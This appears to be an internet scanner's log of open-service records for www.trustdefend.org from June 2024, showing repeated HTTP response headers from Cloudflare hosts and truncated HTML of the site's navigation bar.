                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 2024-06-13 by HttpPlugin
    Create report
  • Open service 2606:4700:3030::6815:1d5d:443 · www.trustdefend.org

    2024-06-13 00:50

    HTTP/1.1 200 OK
    Date: Thu, 13 Jun 2024 00:50:39 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kcJtQKARd0SfU9W0xD8uFH7eN889lIFM4uk33IpdzaHYDDQstohQKffIYUgjLd4OIeT3ngUU9xh46xRfjdVwXkY74N5wBsksBTSiDUw1w75k3jQyXnvuGjWhzpZ%2F8Kq9Nta7Yi2i2EqGotefv9KCKT%2BN"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892e165c2d245d63-FRA
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 2024-06-13 by HttpPlugin
    Create report
  • Open service 2606:4700:3030::6815:1d5d:8443 · www.trustdefend.org

    2024-06-13 00:50

    HTTP/1.1 523 
    Date: Thu, 13 Jun 2024 00:50:29 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: close
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rB7nr0uoG%2Fo25fXHY1XXfckQFi6zcJaZS%2BIT5dY4bcMQuOLlSiRv0biBMSefG8DomzDeaLiVmfo9tCRlTrSwtIqch5MRuO2VIkzuOfXTAG9lPybYQbntKRprtBG%2B%2FM8UE53k9UJrwV1nKJbDDMJRuRgZ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 892e1633c9c035fa-FRA
    alt-svc: h3=":8443"; ma=86400
    
    
    error code: 523
    Found 2024-06-13 by HttpPlugin
    Create report
  • Open service 2606:4700:3031::ac43:94b8:443 · www.trustdefend.org

    2024-06-13 00:50

    HTTP/1.1 200 OK
    Date: Thu, 13 Jun 2024 00:50:39 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iBjFUdkwMvKEwDMWlzdqnDMy32cdHkURZ%2FFgs1DU3mBgs4wcgJ2HUqeUW9VULS%2F29kK%2BaS1FEnA%2BK0vivsKCbpILd7QjES1pQHFxO2UuvsB%2FB9SedoumtKtupVBlil%2B6IfiQvjTEvHvNSc6py7V6zSPQ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892e165dda501c44-FRA
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 2024-06-13 by HttpPlugin
    Create report
  • Open service 104.21.29.93:80 · www.trustdefend.org

    2024-06-13 00:50

    HTTP/1.1 301 Moved Permanently
    Date: Thu, 13 Jun 2024 00:50:29 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Location: https://www.trustdefend.org:443/
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UkmD9T7BqxHtneN3WiU9dIISWnT1JJZcAjIh0jDSTRtGOZvNTaI4FPXn7Wl4QlhYuMI%2FZ%2B2fcClKUWe6jKsl6TrL%2BCBCzpnP%2BOIlKi%2BfnwG5CGKbLkL6EZPtlYfEmswovypQk04r"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892e16333c233807-FRA
    alt-svc: h3=":443"; ma=86400
    
    Page title: 301 Moved Permanently
    
    <html>
    <head><title>301 Moved Permanently</title></head>
    <body>
    <center><h1>301 Moved Permanently</h1></center>
    <hr><center>nginx/1.20.2</center>
    </body>
    </html>
    
    Found 2024-06-13 by HttpPlugin
    Create report
  • Open service 172.67.148.184:8443 · www.trustdefend.org

    2024-06-13 00:50

    HTTP/1.1 523 
    Date: Thu, 13 Jun 2024 00:50:29 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: close
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=akcCqTpaSXtTfoCRf8DMdLbccHUGE47f69t3iC5%2FCpIBZmdstgT7L8ZXZhm3kqvBoIsHr%2FneXvE8HjwjYat%2BuuVWJS1UD3r%2B9Yj6xhUanDlDVFtpA7cF4fQ%2BqI4FYTfViWVjS2gC"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 892e163369569bbe-FRA
    alt-svc: h3=":8443"; ma=86400
    
    
    error code: 523
    Found 2024-06-13 by HttpPlugin
    Create report
  • Open service 172.67.148.184:443 · www.trustdefend.org

    2024-06-13 00:50

    HTTP/1.1 200 OK
    Date: Thu, 13 Jun 2024 00:50:39 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IscU35xsNoSkpuZCQhpE6fNtRGMEpKQ%2BkVFau%2FVvIPnuj%2B%2FC8dh3vHt0XD6XyFQ%2BWn5jDUbZSUjc7mXAG4cCSze6AGQzT4wBr5ll6molR%2BPDfJlMCHmjoTve1s1BA2FUznWChTyg"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892e165a5ef09f36-FRA
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 2024-06-13 by HttpPlugin
    Create report
  • Open service 172.67.148.184:80 · www.trustdefend.org

    2024-06-13 00:50

    HTTP/1.1 301 Moved Permanently
    Date: Thu, 13 Jun 2024 00:50:29 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Location: https://www.trustdefend.org:443/
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i0qkAGHbNmNwMHlyZPjhtHZgKJ%2F1oVxLL%2BGmeBu9LgoUDKshvfgs%2BRHNoI%2FfsijoCxbujk5NnXwHg1WfOGKCZ0mpXre9BqaR%2FEIuTZxGfEMfHvjR8w67RYIf1DiPZg9745iA4IV5"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892e163308052c23-FRA
    alt-svc: h3=":443"; ma=86400
    
    Page title: 301 Moved Permanently
    
    <html>
    <head><title>301 Moved Permanently</title></head>
    <body>
    <center><h1>301 Moved Permanently</h1></center>
    <hr><center>nginx/1.20.2</center>
    </body>
    </html>
    
    Found 2024-06-13 by HttpPlugin
    Create report
  • Open service 104.21.29.93:443 · www.trustdefend.org

    2024-06-12 04:01

    HTTP/1.1 200 OK
    Date: Wed, 12 Jun 2024 04:01:16 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VxvQP187aKTkyHB19Wg%2FnK7gTuU9GAWxGWAqDWaOM6%2BryDfs9aV8IwV0%2FcheR9nP6vca9MusHLp8JDa76acRHaOstRhHIVYYWJfxPHIzLp%2BerBtGwPoNmZ0wuw4a%2B4jIzQ3oDZ85"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8926f04c0d64aaee-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 2024-06-12 by HttpPlugin
    Create report
  • Open service 104.21.29.93:443 · www.trustdefend.org

    2024-06-10 00:57

    HTTP/1.1 200 OK
    Date: Mon, 10 Jun 2024 00:57:03 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V3MbY3aaXZ%2BOtmckJA%2FxbqUMiGnPoIIzAOfgZ9DD2F0PKsgKumkFmqvBr2oCliDQxH4WQwb7i9zD%2FzJ7B%2Ft%2BdAui3V6BzbnStNer6FjQp7%2Bn%2F2eqVerpG4VvsTYJlROq68Bm9sn1"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 891567b4ed2879b7-LHR
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 2024-06-10 by HttpPlugin
    Create report
  • Open service 104.21.29.93:443 · www.trustdefend.org

    2024-06-08 00:56

    HTTP/1.1 200 OK
    Date: Sat, 08 Jun 2024 00:56:51 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=amUSrxX9DzBX%2BNVSICOhH%2BtZmQhaczq7p13bGHgDEwsrn1b02j3Da1tAYQswJ585RFxYjCD2Ki5by2OyYpGDRdYhm161tcBDt4M90BZZrS7fOz5YCODIUYZf2GeCLef8uo0u0FpA"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8904eca8fac80363-CDG
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 2024-06-08 by HttpPlugin
    Create report
  • Open service 104.21.29.93:443 · www.trustdefend.org

    2024-06-06 13:25

    HTTP/1.1 200 OK
    Date: Thu, 06 Jun 2024 13:25:38 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8dyiYBAIZYG9TNab%2F5076LdcTCI5u0AF9spHDVtvMdZG7ZbnxONb3WB6JBiFAoLG1p4Wx26J4WhYBhDqwMBEWHr%2BLIKNwUwEPCRonC2n4Nv3eEXeqyfhR%2BzUBMjJLHw4IgqXFhf4"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88f8babf5fa0aaf1-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
